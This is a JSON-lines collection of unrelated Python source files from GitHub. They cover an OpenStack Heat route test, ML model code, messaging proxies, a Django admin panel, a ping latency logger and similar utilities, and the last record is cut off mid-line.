+{"seq_id":"75144706811","text":"import yaml\n\nfrom oslo_log import log\nfrom tempest.lib import decorators\n\nfrom heat_tempest_plugin.common import test\nfrom heat_tempest_plugin.tests.functional import functional_base\n\n\nLOG = log.getLogger(__name__)\n\ntest_template = '''\nheat_template_version: pike\ndescription: Test template for OS::Neutron::ExtraRouteSet\nresources:\n  net0:\n    type: OS::Neutron::Net\n  subnet0:\n    type: OS::Neutron::Subnet\n    properties:\n      network: { get_resource: net0 }\n      cidr: 10.0.0.0/24\n  router0:\n    type: OS::Neutron::Router\n  routerinterface0:\n    type: OS::Neutron::RouterInterface\n    properties:\n      router: { get_resource: router0 }\n      subnet: { get_resource: subnet0 }\n  extrarouteset0:\n    type: OS::Neutron::ExtraRouteSet\n    properties:\n      router: { get_resource: router0 }\n      routes:\n        - destination: 10.0.10.0/24\n          nexthop: 10.0.0.10\n        - destination: 10.0.11.0/24\n          nexthop: 10.0.0.11\n'''\n\n\ndef _routes_to_set(routes):\n    '''Convert a list of extra routes to an unordered data type.'''\n    return set(frozenset(r.items()) for r in routes)\n\n\n@test.requires_resource_type('OS::Neutron::ExtraRouteSet')\nclass ExtraRouteSetTest(functional_base.FunctionalTestsBase):\n\n    def _create(self, template_routes):\n        parsed_template = yaml.safe_load(test_template)\n        parsed_template['resources'][\n            'extrarouteset0']['properties']['routes'] = template_routes\n        create_template = yaml.safe_dump(parsed_template)\n\n        stack_id = self.stack_create(template=create_template)\n\n        neutron_router_id = self.get_physical_resource_id(\n            stack_id, 'router0')\n        neutron_router = self.network_client.show_router(\n            neutron_router_id)['router']\n        neutron_routes = neutron_router['routes']\n\n        self.assertEqual(\n            _routes_to_set(template_routes),\n            _routes_to_set(neutron_routes))\n\n    @decorators.idempotent_id('95b92c1e-d082-11e9-9e5d-9bdb7311b69b')\n    def test_create_no(self):\n        self._create(template_routes=[])\n\n    @decorators.idempotent_id('abda6884-d0b2-11e9-9819-4f4e24c86c92')\n    def test_create_one(self):\n        self._create(template_routes=[\n            {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n        ])\n\n    @decorators.idempotent_id('b3a9b6be-d0b2-11e9-a504-7b3ba6df5e7a')\n    def test_create_many(self):\n        self._create(template_routes=[\n            {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n            {'destination': '10.0.11.0/24', 'nexthop': '10.0.0.11'},\n        ])\n\n    def _update(self, template_routes):\n        stack_id = self.stack_create(template=test_template)\n\n        parsed_template = yaml.safe_load(test_template)\n        parsed_template['resources'][\n            'extrarouteset0']['properties']['routes'] = template_routes\n        updated_template = yaml.safe_dump(parsed_template)\n        self.update_stack(stack_id, updated_template)\n\n        neutron_router_id = self.get_physical_resource_id(\n            stack_id, 'router0')\n        neutron_router = self.network_client.show_router(\n            neutron_router_id)['router']\n        neutron_routes = neutron_router['routes']\n\n        self.assertEqual(\n            _routes_to_set(template_routes),\n            _routes_to_set(neutron_routes))\n\n    @decorators.idempotent_id('6dcf2110-d0b7-11e9-b26b-9f2e5e98d09d')\n    def test_update_no(self):\n        self._update(template_routes=[])\n\n    @decorators.idempotent_id('6e3cea1a-d0b7-11e9-aebc-f7922b833ea5')\n    def test_update_one(self):\n        self._update(template_routes=[\n            {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n        ])\n\n    @decorators.idempotent_id('6e970126-d0b7-11e9-8ec8-afde1e726d0f')\n    def test_update_many(self):\n        self._update(template_routes=[\n            {'destination': '10.0.10.0/24', 'nexthop': '10.0.0.10'},\n            {'destination': '10.0.11.0/24', 'nexthop': '10.0.0.11'},\n        ])\n","repo_name":"openstack/heat-tempest-plugin","sub_path":"heat_tempest_plugin/tests/functional/test_extra_route_set.py","file_name":"test_extra_route_set.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"}
+{"seq_id":"29493621970","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.metrics import r2_score\n\n# Create sample data\ndata = {'Time': [1, 2, 3, 4, 5, 6, 7],\n        'Sales': [10, 20, 45, 30, 35, 40, 45]}\n\ndf = pd.DataFrame(data)\n\n# Visualize the data\nplt.scatter(df['Time'], df['Sales'], color='blue')\nplt.xlabel('Time')\nplt.ylabel('Sales')\nplt.title('Time vs. Sales')\nplt.show()\n\n# Using Linear Regression\nX_linear = df[['Time']]\ny_linear = df['Sales']\n\nlinear_model = LinearRegression()\nlinear_model.fit(X_linear, y_linear)\nlinear_y_pred = linear_model.predict(X_linear)\n\nlinear_r2 = r2_score(y_linear, linear_y_pred)\n\nprint(f\"Linear R-squared score: {linear_r2}\")\n\n# Using Polynomial Regression\ndegree = 2  # Degree of the polynomial\npoly = PolynomialFeatures(degree)\nX_poly = poly.fit_transform(X_linear)\n\npoly_model = LinearRegression()\npoly_model.fit(X_poly, y_linear)\npoly_y_pred = poly_model.predict(X_poly)\n\npoly_r2 = r2_score(y_linear, poly_y_pred)\n\nprint(f\"Polynomial R-squared score: {poly_r2}\")\n","repo_name":"Omel1311/USPA_Omelianenko","sub_path":"Regression/PolY_Linier_regr.py","file_name":"PolY_Linier_regr.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"40819498503","text":"from __future__ import absolute_import\n\nfrom flask import Blueprint, request, url_for\nfrom sqlalchemy.sql import and_, desc, not_, or_\nfrom sqlalchemy.orm import aliased, contains_eager, joinedload\n\nfrom pyaspora.database import db\nfrom pyaspora.post.models import Post, Share\nfrom pyaspora.post.views import json_posts\nfrom pyaspora.tag.models import PostTag, Tag\nfrom pyaspora.user.session import require_logged_in_user\nfrom pyaspora.utils.rendering import add_logged_in_user_to_data, \\\n    redirect, render_response\n\nblueprint = Blueprint('feed', __name__, template_folder='templates')\n\n\n@blueprint.route('/', methods=['GET'])\n@require_logged_in_user\ndef view(_user):\n    \"\"\"\n    Show the logged-in user their own feed.\n    \"\"\"\n    from pyaspora.diaspora.models import MessageQueue\n    if MessageQueue.has_pending_items(_user):\n        return redirect(url_for('diaspora.run_queue', _external=True))\n\n    limit = int(request.args.get('limit', 10))\n    friend_ids = [f.id for f in _user.contact.friends()]\n    clauses = [Post.Queries.shared_with_contact(_user.contact)]\n    if friend_ids:\n        clauses.append(\n            Post.Queries.authored_by_contacts_and_public(friend_ids))\n    tag_ids = [t.id for t in _user.contact.interests]\n    if tag_ids:\n        clauses.append(Tag.Queries.public_posts_for_tags(tag_ids))\n    feed_query = or_(*clauses)\n    my_share = aliased(Share)\n    feed = db.session.query(Share).join(Post). \\\n        outerjoin(  # Stuff user hasn't hidden\n            my_share,\n            and_(\n                Post.id == my_share.post_id,\n                my_share.contact == _user.contact\n            )\n        ). \\\n        outerjoin(PostTag).outerjoin(Tag). \\\n        filter(feed_query). \\\n        filter(or_(my_share.hidden == None, not_(my_share.hidden))). \\\n        filter(Post.parent == None). \\\n        order_by(desc(Post.thread_modified_at)). \\\n        group_by(Post.id). \\\n        options(contains_eager(Share.post)). \\\n        options(joinedload(Share.post, Post.diasp)). \\\n        limit(limit)\n\n    data = {\n        'feed': json_posts([(s.post, s) for s in feed], _user, True),\n        'limit': limit,\n        'actions': {},\n    }\n\n    if len(data['feed']) >= limit:\n        data['actions']['more'] = url_for('feed.view', limit=limit + 10, _external=True)\n\n    add_logged_in_user_to_data(data, _user)\n\n    return render_response('feed.tpl', data)\n","repo_name":"piraz/pyaspora","sub_path":"pyaspora/feed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"}
+{"seq_id":"464344403","text":"import numpy as np\nfrom copy import deepcopy\nfrom typing import Type\nfrom Factories.ModelsFactory.linear_models import LinearizedQuadNoYaw\nfrom Factories.DataManagementFactory.data_holders import DataHolder\nclass QuadTranslationalDynamicsUncertain:\n    def __init__(self, parameters_holder: Type[DataHolder]):\n        self.parameters_holder = parameters_holder\n        self.parameters = parameters_holder.get_data()\n        self.m = self.parameters_holder.m\n        self.g = self.parameters_holder.g\n        self.G = self.m\n        self.G_Inv = 1 / self.G\n\n    def __call__(self, z, u, u_l1, sigma_hat):\n        f = (1 / self.m) * u - np.array([0, 0, 1]) * self.g\n        g = (1 / self.m) * (u_l1 + sigma_hat)\n        dyn = f + g\n        return dyn\n\n    def update_parameters(self):\n        self.parameters = self.parameters_holder.get_data()\n        self.m = self.parameters_holder.m\n        self.g = self.parameters_holder.g\n        self.G = self.m\n        self.G_Inv = 1 / self.G\nclass NonlinearQuadUncertain:\n    def __init__(self):\n        pass\n    def __call__(self):\n        pass\n\nclass LinearQuadUncertain(LinearizedQuadNoYaw):\n    def __init__(self, parameters_holder: Type[DataHolder],yaw_ss=0.0, x_ref=0.0, y_ref=0.0, z_ref=0.0):\n        super().__init__(parameters_holder, Ts=None, yaw_ss=yaw_ss, x_ref=x_ref, y_ref=y_ref, z_ref=z_ref)\n        self.A = self.A[3:6, 3:6]\n        self.B = self.B[3:6, :]\n        self.C = self.C[3:6, 3:6]\n        self.D = self.D[3:6, :]\n        self.G = self.B\n        if isinstance(self.G, np.ndarray):\n            self.G_Inv = np.linalg.inv(self.G)\n        else:\n            self.G_Inv = 1 / self.G\n\n    def __call__(self, z, u, u_l1, sigma_hat):\n        f = self.A @ z + self.B @ u\n        g = self.B @ (u_l1 + sigma_hat)\n        dyn = f + g\n        return dyn\n    def update_parameters(self):\n        self.m = self.parameters_holder.m\n        self.g = self.parameters_holder.g\n        self.parameters = self.parameters_holder.get_data()\n        self.B = np.array([[0.0, 0.0, 0.0],\n                           [0.0, 0.0, 0.0],\n                           [0.0, 0.0, 0.0],\n                           [0.0, self.g * np.sin(self.yaw_ss), self.g * np.cos(self.yaw_ss)],\n                           [0.0, -self.g * np.cos(self.yaw_ss), self.g * np.sin(self.yaw_ss)],\n                           [1 / self.m, 0.0, 0.0]])\n        self.B = self.B[3:6, :]\n        self.G = self.B\n        if isinstance(self.G, np.ndarray):\n            self.G_Inv = np.linalg.inv(self.G)\n        else:\n            self.G_Inv = 1/self.G\n\nif __name__ == \"__main__\":\n    from Factories.ModelsFactory.model_parameters import Z550_parameters\n    model = LinearQuadUncertain(Z550_parameters)","repo_name":"froxec/AdaptiveDrone","sub_path":"Factories/ModelsFactory/uncertain_models.py","file_name":"uncertain_models.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"29985060894","text":"import numpy as np\nimport tensorflow as tf\n\nimport utility as U\n\n\nclass Base(object):\n    def __init__(self, is_training_tf, use_noisynet, use_layer_norm):\n        self._use_noisynet = use_noisynet\n        self._use_layer_norm = use_layer_norm\n        self._is_training_tf = is_training_tf\n\n    def __call__(self, *args):\n        return NotImplementedError\n\n    def _build_hidden_layer(self, x, layer, activation_fn=None):\n        if self._use_noisynet:\n            x = U.independent_noisy_layer(x, layer, self._is_training_tf)\n        else:\n            init = self._ddpg_init(x)\n            x = tf.layers.dense(x, layer, kernel_initializer=init, bias_initializer=init)\n            if self._use_layer_norm:\n                x = tf.contrib.layers.layer_norm(x)\n        if activation_fn:\n            return activation_fn(x)\n        return x\n\n    @staticmethod\n    def _ddpg_init(x):\n        val = 1 / np.sqrt(x.get_shape().as_list()[1])\n        return tf.random_uniform_initializer(-val, val)\n\n\nclass Actor(Base):\n    def __init__(self, action_dim, max_action, is_training_tf, use_layer_norm, use_noisynet):\n        super(Actor, self).__init__(is_training_tf, use_noisynet, use_layer_norm)\n        self._max_action = max_action\n        self._action_dim = action_dim\n\n    def __call__(self, observation_tf, name, reuse=None):\n        with tf.variable_scope(name) as vs:\n            if reuse:\n                vs.reuse_variables()\n            out = observation_tf\n\n            layers = (200, 100,)\n            for i, layer in enumerate(layers):\n                with tf.variable_scope('layer_{}'.format(i)):\n                    out = self._build_hidden_layer(out, layer, tf.nn.relu)\n\n            if self._use_noisynet:\n                out = U.independent_noisy_layer(\n                    out, self._action_dim, self._is_training_tf, name='output_layer')\n            else:\n                out = tf.layers.dense(out, self._action_dim, name='output_layer')\n            out = tf.multiply(tf.sigmoid(out), self._max_action)\n\n        return out\n\n\nclass Critic(Base):\n    def __init__(self, is_training_tf, use_layer_norm, use_noisynet):\n        super(Critic, self).__init__(is_training_tf, use_noisynet, use_layer_norm)\n\n    def __call__(self, observation_tf, action_tf, name, reuse=None):\n        with tf.variable_scope(name) as vs:\n            if reuse:\n                vs.reuse_variables()\n            out = observation_tf\n            layers = (200, 100,)\n            for i, layer in enumerate(layers):\n                with tf.variable_scope('layer_{}'.format(i)):\n                    if i == 1:\n                        out = tf.concat((out, action_tf), axis=1)\n                    out = self._build_hidden_layer(out, layer, tf.nn.relu)\n            if self._use_noisynet:\n                out = U.independent_noisy_layer(out, 1, self._is_training_tf, name='output_layer')\n            else:\n                out = tf.layers.dense(out, 1, name='output_layer')\n\n        return out\n","repo_name":"SURYAVAMSIPSN/Obstacle-Avoidance-Reinforcement-Learning","sub_path":"agents/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
+{"seq_id":"20493785875","text":"import torch\nfrom torch import nn\nimport d2l_pytorch.d2l as d2l\n\n\n# 1 多输⼊通道\n\n# 输入数据含多个通道时,需要构造输入通道数与输入的数据的通道数相同的卷积核\ndef corr2d_multi_in(X, K):\n    # 沿着X和K的第0维(通道维)分别计算再计算\n    res = d2l.corr2d(X[0, :, :], K[0, :, :])\n    for i in range(1, X.shape[0]):\n        res += d2l.corr2d(X[i, :, :], K[i, :, :])\n    return res\n\n\nX = torch.tensor([[[0, 1, 2], [3, 4, 5], [6, 7, 8]],\n                  [[1, 2, 3], [4, 5, 6], [7, 8, 9]]])\n\nK = torch.tensor([[[0, 1], [2, 3]], [[1, 2], [3, 4]]])\n\nprint(corr2d_multi_in(X, K))\n\n\n# 2 多输出通道\n\n# 使用相同的输入,使用不同组的卷积核张量创造不同的输出\ndef corr2d_multi_in_out(X, K):\n    return torch.stack([corr2d_multi_in(X, k) for k in K])\n\n\nK = torch.stack([K, K + 1, K + 2])\nprint(K.shape)\n# torch.Size([3, 2, 2, 2]) 通道数output,通道数input,高,宽\n\nprint(corr2d_multi_in_out(X, K))\n\n\n# 3 卷积层\n\ndef corr2d_multi_in_out_1x1(X, K):\n    c_i, h, w = X.shape\n    c_o = K.shape[0]\n    X = X.view(c_i, h * w)\n    K = K.view(c_o, c_i)\n    # mm 全连接层的矩阵乘法\n    Y = torch.mm(K, X)\n    return Y.view(c_o, h, w)\n\n\nX = torch.rand(3, 3, 3)\nK = torch.rand(2, 3, 1, 1)\n\nY1 = corr2d_multi_in_out_1x1(X, K)\nY2 = corr2d_multi_in_out(X, K)\n\nprint((Y1 - Y2).norm().item() < 1e-6)\nprint((Y1 - Y2).norm().item())\n","repo_name":"Emryshuang/pytorch_study","sub_path":"ch5/5_3.py","file_name":"5_3.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"27167549509","text":"from os import listdir\nimport os\n\norigDir = \"C:/Users/t_tor/Unsynced/coco/annotations_boat_old/\"\ntargetDir = \"C:/Users/t_tor/Unsynced/coco/annotations_boat/\"\n\nif not os.path.exists(targetDir):\n    os.makedirs(targetDir)\n\ncatOld = '9'\ncatNew = 'boat'\nnameTagOld = '<name>' + catOld + '</name>'\nnameTagNew = '<name>' + catNew + '</name>'\n\t\t\nnFiles = len(listdir(origDir))\nprogress = 0\nfor filename in listdir(origDir):\n\tprogress += 1\n\tprint(str(progress) + '/' + str(nFiles))\n\tf1 = open(origDir+filename, 'r')\n\tf2 = open(targetDir+filename, 'w')\n\tfor line in f1:\n\t\tf2.write(line.replace(nameTagOld,nameTagNew))\n\tf2.close()\n\tf1.close()\n\t\t","repo_name":"tobiastorben/colab_repo","sub_path":"change_cat_name.py","file_name":"change_cat_name.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"34068246726","text":"#Lab Test Sample, Question 2, solution\n\nimport RPi.GPIO as G\nimport time\n\nno_of_small = 0\nno_of_big = 0\n\ndef on_LED(LED, on_seconds, off_seconds):\n    if LED == 'red':\n        G.output(27, True)\n        time.sleep(on_seconds)\n        G.output(27, False)\n        time.sleep(off_seconds)\n    else: #assume Green LED if it's not Red\n        G.output(22, True)\n        time.sleep(on_seconds)\n        G.output(22, False)\n        time.sleep(off_seconds)    \n    \n    \n    \n\ntry:\n    G.setwarnings(False) #supress warning messages\n    \n    G.setmode(G.BCM)\n    G.setup(27, G.OUT)\n    G.setup(22, G.OUT)\n    G.setup(4, G.IN)\n    G.setup(5, G.IN)\n    \n    print('This prog count the no. of large & small dust particles...')\n    \n    while True:\n        diam = float( input('Enter dust partical diameter (in mico-meter): ') )\n        if (diam > 50):\n            no_of_big += 1\n            print(f\"no. of big dust particles = {no_of_big}\")   \n            on_LED('red', 1, 0)\n            \n            print('Press button to undo wrongly entered big diameter...')\n            for i in range(150):  #give use 3s to undo the wrong diam he just entered   \n                if G.input(4) == 0:   \n                    no_of_big -=1\n                    print('Button pressed. ')\n                    print(f\"no. of big dust particles is: {no_of_big}\")\n                    break #button already pressed. No need to detech button-press anymore\n                else:\n                    time.sleep(0.02) #0.02s x 150 = 3s   \n            \n            \n        else:\n            no_of_small += 1\n            print(f\"no. of Small dust particles = {no_of_small}\")\n            on_LED('green', 1, 0)\n\n            print('Press button to undo wrongly entered Small diameter...')\n            for i in range(150):  #give use 3s to undo the wrong diam he just entered   \n                if G.input(4) == 0:   \n                    no_of_small -=1\n                    print('Button pressed. ')\n                    print(f\"no. of Small dust particles is: {no_of_small}\")\n                    break #button already pressed. No need to detech button-press anymore\n                else:\n                    time.sleep(0.02) #0.02s x 150 = 3s   \n            \n            \n            \nexcept KeyboardInterrupt:\n    G.cleanup()\n","repo_name":"MuhdSyahir10/MobilePatient","sub_path":"Practical Test 1/labtest_Sample_Q2.py","file_name":"labtest_Sample_Q2.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"24292122367","text":"#! /usr/bin/env python\n# -*- coding=utf-8 -*-\n\n\"\"\"\nCreated on 2018-10-22\n存储模块到收集模块的代理\n@author: lkw\n\"\"\"\n\nimport zmq\n\n\ndef main():\n    try:\n        context = zmq.Context(1)\n        # 接受存储模块的pull任务\n        frontend = context.socket(zmq.PULL)\n        frontend.bind(\"tcp://*:5561\")\n\n        # 将存储模块的任务分发给收集模块进行存储\n        backend = context.socket(zmq.PUSH)\n        backend.bind(\"tcp://*:5562\")\n\n        # zmq.device()里有个while True\n        zmq.device(zmq.STREAMER, frontend, backend)\n    except Exception as e:\n        print(e)\n        print(\"bringing down zmq device\")\n    finally:\n        # pass\n        frontend.close()\n        backend.close()\n        context.term()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"likeweilikewei/Python-study-demo","sub_path":"zeromq/combination/qlus_dealer_pipeline/streamer_collect.py","file_name":"streamer_collect.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"}
+{"seq_id":"2287131439","text":"import logging\n\nfrom aiogram import types\nfrom io import BytesIO\n\nfrom aiogram.types import BufferedInputFile\n\nfrom common.keyboards.base import CancelKeyboard\nfrom common.utils.functions import get_now\n\n\nasync def send_file(message: types.Message,\n                    image_io: BytesIO,\n                    from_bank,\n                    to_bank,\n                    device):\n    photo = BufferedInputFile(\n        file=image_io.read(),\n        filename=f\"{get_now():%d_%m_%y__%H_%M_%S}.PNG\"\n    )\n\n    await message.answer_document(\n        document=photo,\n        reply_markup=CancelKeyboard.build()\n    )\n\n    logging.info(f\"[SCREEN] |{message.from_user.id}| {from_bank}->{to_bank}/{device}\")\n","repo_name":"rSlow/idiotDiaryV2","sub_path":"telegram_bot/apps/free_shaurma/utils/send_files.py","file_name":"send_files.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"43588315576","text":"from Widget.HistoryWindow import HistoryWindow\nfrom PyQt5.QtWidgets import QPushButton, QSizePolicy\n\n# Button in AlgView that open the History Window\nclass HistoryButton(QPushButton):\n    \n    def __init__(self, model, **kwargs):\n        super().__init__(**kwargs)\n\n        # Define the model\n        self._model = model\n\n        # Connect History button to its Window and define its ok_button configuration\n        self._window = HistoryWindow(model)\n\n        self._name ='history'\n        self.setText('{}'.format(self._name))\n        self.clicked.connect(lambda : self._window.exec_())\n        self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))\n\n        self._model.resetHistoryWindowSignal.connect(self.resetHistoryWindow)\n\n    def resetHistoryWindow(self):\n        self._window = HistoryWindow(self._model)","repo_name":"giuliobz/InverseReinforcementLearningApp","sub_path":"Widget/HistoryButton.py","file_name":"HistoryButton.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"36181559155","text":"import json\nimport threading\nimport pika\n\nfrom common.constants import Constants\nfrom common.data_request import DataRequest, MessageType\n\n\nclass BackendServer:\n    def __init__(self, app_socket_io_context):\n        self.socketio = app_socket_io_context\n        self._init_queues()\n        threading.Thread(target=self.listen_data_receive).start()\n\n    def _create_connection(self):\n        host = Constants.QUEUE_HOST\n        port = Constants.QUEUE_PORT\n        return pika.BlockingConnection(pika.ConnectionParameters(host=host, port=port, heartbeat=0))\n\n    def _init_queues(self):\n        \"\"\" Initialize the queues. It's redundant if they exist. \"\"\"\n        connection = self._create_connection()\n        with connection.channel() as channel:\n            channel.queue_declare(queue=Constants.QUEUE_NAME_REQUEST, exclusive=False)\n            channel.queue_declare(queue=Constants.QUEUE_NAME_RESPOND, exclusive=False)\n        connection.close()\n\n    def send_data_request(self, data_request: DataRequest):\n        connection = self._create_connection()\n        try:\n            serialized_request = data_request.to_json()\n            with connection.channel() as channel:\n                channel.basic_publish(\n                    exchange='',\n                    routing_key=Constants.QUEUE_NAME_REQUEST,\n                    body=serialized_request\n                )\n                print('update_request', 'sent to MLBackend', data_request)\n        finally:\n            connection.close()\n\n    def listen_data_receive(self):\n        connection = self._create_connection()\n        channel = connection.channel()\n\n        def callback(ch, method, properties, body):\n            print('update_request', 'Flask got', body)\n            deserialized_data = json.loads(body)\n            processed_data = deserialized_data[\"processed_data\"]\n            serialized_request = deserialized_data[\"original_data\"]\n\n            data = json.loads(serialized_request)\n            print(data)\n            data_request = DataRequest.from_json(data)\n\n            self.emit_event(data_request=data_request, processed_data=processed_data)\n\n        channel.basic_consume(queue=Constants.QUEUE_NAME_RESPOND, on_message_callback=callback, auto_ack=True)\n        try:\n            channel.start_consuming()\n        finally:\n            channel.close()\n            connection.close()\n\n    def emit_event(self, data_request: DataRequest, processed_data):\n        event_mapping = {\n            MessageType.PRICE_HISTORY: 'update_price_history',\n            MessageType.PRICE_FORECAST: 'update_price_forecast',\n            MessageType.SENTIMENT: 'update_sentiment',\n            MessageType.ARTICLE_LIST: 'update_article_list',\n            MessageType.CURRENT_PRICE: 'update_current_price',\n        }\n\n        event_name = event_mapping.get(data_request.message_type)\n\n        if event_name:\n            self.socketio.emit(event_name, processed_data, namespace='/dashboard', to=data_request.ticker)\n            print(f\"Emitted event: {event_name}\",\n                  f\"processed_data={processed_data}\",\n                  f\"For Data Request: {data_request.to_json()}\")\n        else:\n            print(f\"Invalid event name: {event_name}\")\n","repo_name":"Idawid/BEng-Thesis-Group-Project","sub_path":"App/app/flask_rabbitmq_connector.py","file_name":"flask_rabbitmq_connector.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"21838107934","text":"#!/usr/bin/python3\n\nfrom influxdb import InfluxDBClient\nfrom datetime import datetime\nfrom pytz import timezone\nfrom pytz import timezone\nimport subprocess\nimport re\nimport datetime\n\nclient = InfluxDBClient(host='153.126.210.53',port=8086,database='ping')\n\n#ping 1.1.1.1\nping1 = subprocess.run([\"ping\",\"1.1.1.1\", \"-c\",\"2\"],stdout=subprocess.PIPE)\n\n#bye -> str\nping1 = ping1.stdout.decode(\"utf-8\")\n\np = r'time=(.*)'\nm = re.search(p, ping1)\nt = m.group(1)\nsec_ping1 = re.sub(\"[^\\d.]\", \"\", t)\nsec_ping1 = float(sec_ping1)\nprint(sec_ping1)\n\n#ping 8.8.8.8\nping2 = subprocess.run([\"ping\",\"8.8.8.8\", \"-c\",\"2\"],stdout=subprocess.PIPE)\n\nping2 = ping2.stdout.decode(\"utf-8\")\n\np = r'time=(.*)'\nm = re.search(p, ping2)\nt = m.group(1)\nsec_ping2 = re.sub(\"[^\\d.]\", \"\", t)\nsec_ping2 = float(sec_ping2)\nprint(sec_ping2)\n\n#ping codeblue.jp\nping3 = subprocess.run([\"ping\",\"codeblue.jp\", \"-c\",\"2\"],stdout=subprocess.PIPE)\n\nping3 = ping3.stdout.decode(\"utf-8\")\n\np = r'time=(.*)'\nm = re.search(p, ping3)\nt = m.group(1)\nsec_ping3 = re.sub(\"[^\\d.]\", \"\", t)\nsec_ping3 = float(sec_ping3)\nprint(sec_ping3)\n\n#db\n#time = datetime.now(timezone('UTC')).isoformat()\n\njson_body = [\n        {\n            \"measurement\": \"ping\",\n            \"time\": datetime.datetime.utcnow(),\n            \"fields\": {\n                \"ping 1.1.1.1\": sec_ping1,\n                \"ping 8.8.8.8\": sec_ping2,\n                \"ping codeblue.jp\": sec_ping3\n            }\n        }\n    ]\n\nclient.write_points(json_body)\n\n","repo_name":"ryuji-jp/ping","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"9895191262","text":"from django.contrib import admin\nfrom django.contrib.admin import AdminSite\n\nfrom admin_web.admin_models import registration_load\n\n\nclass MyAdminSite(AdminSite):\n    site_header = \"ARHPG Панель\"\n    site_title = \"Админ-панель |\"\n    index_title = \" \"\n\n    def get_app_list(self, request, *args, **kwargs):\n        app_dict = self._build_app_dict(request)\n        app_list = sorted(app_dict.values(), key=lambda x: x[\"name\"].lower())\n        if app_list:\n            new_app = {\"name\": \"Основная\", \"app_label\": \"admin_web\", \"has_module_perms\": True, \"models\": []}\n            hide_list = [\"FaqAttachment\", \"CategoryText\", \"NotificationReport\", \"NotificationUser\"]\n\n            category_1_app = {\"name\": \"Категория 1\", \"has_module_perms\": True, \"models\": []}\n            category_1_list = [\"\"]\n\n            for app in app_list:\n                for model in app[\"models\"]:\n                    if model[\"object_name\"] in hide_list:\n                        pass\n                    elif model[\"object_name\"] in category_1_list:\n                        category_1_app[\"models\"].append(app[\"models\"][app[\"models\"].index(model)])\n                    else:\n                        new_app[\"models\"].append(app[\"models\"][app[\"models\"].index(model)])\n\n            app_list[0] = new_app\n            app_list.append(category_1_app) if category_1_app[\"models\"] else None\n        return app_list\n\n\nadmin_site = MyAdminSite()\n\nregistration_load()\n","repo_name":"yegoryakubovich/arhpg","sub_path":"admin/admin_web/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"29694207198","text":"import os\nimport glob\nimport pickle\nimport numpy as np\n\n#**** Parameters to set at runtime ****#\nkeys = ['product development','environmental protection','profit'] #base keywords\n#**** Parameters to set at runtime ****#\n\nword_vecs_file = 'word_vecs.dat' #object file containing word vector\nimg_vecs_file = 'img_vecs.dat' #object file that stores the file name and probability vector for each image\nword_img_vecs_file = 'word_img_vecs.dat' #object file that stores the combined vectors of words and images\nin_txt_dir = 'txt' #directory of input files (text of each page)\n\n#Get a dictionary object containing word vectors and image vectors\nwith open(word_vecs_file, 'rb') as f:\n    obj = pickle.load(f)\n    word_vecs_dict = obj['word_vecs'] #Dictionary of \"word-text:word-vector\"\n\nwith open(img_vecs_file, 'rb') as f:\n    obj = pickle.load(f)\n    img_vecs_dict = obj['img_vecs'] #Dictionary of \"page ID_image ID: image vector\"\n\n#Prepare a page text file for linking word vectors and page IDs\ntext_dict = {} \nfpath = os.path.join(in_txt_dir,'*')\nfiles = glob.glob(fpath)\nfor file in files:\n    with open(file, 'r', encoding='shift-jis') as f_in:\n        p_text = f_in.read()\n        file_name = os.path.basename(file)\n        p_id = os.path.splitext(file_name)[0]\n        text_dict[p_id] = p_text #Dictionary of \"page ID: page text\"\n\n#Create a dictionary containing a list of page IDs containing each word\nword_dict = {} \nfor w_key in word_vecs_dict.keys():\n    if w_key in keys:\n        word_dict[w_key] = [0] #Add \"0\" as page ID for base keywords\n    else:\n        p_id_list = [int(p_id) for p_id, p_text in text_dict.items() if w_key in p_text] \n        word_dict[w_key] = p_id_list\n        \n#Combine word vector and image vector\nword_img_list = [] #Tuple list of (word text_page ID_image ID, word vector + image vector)\nfor w_key in word_dict.keys():\n    p_id_list = word_dict[w_key]\n    word_vec = word_vecs_dict[w_key]\n    for p_id in p_id_list:\n        #Get the image id with the page ID of the page containing the word 'w_key' and combine the word and image vectors\n        for i_key in [key for key in img_vecs_dict.keys() if p_id == int(key.split('_')[0])]:\n            img_vec = 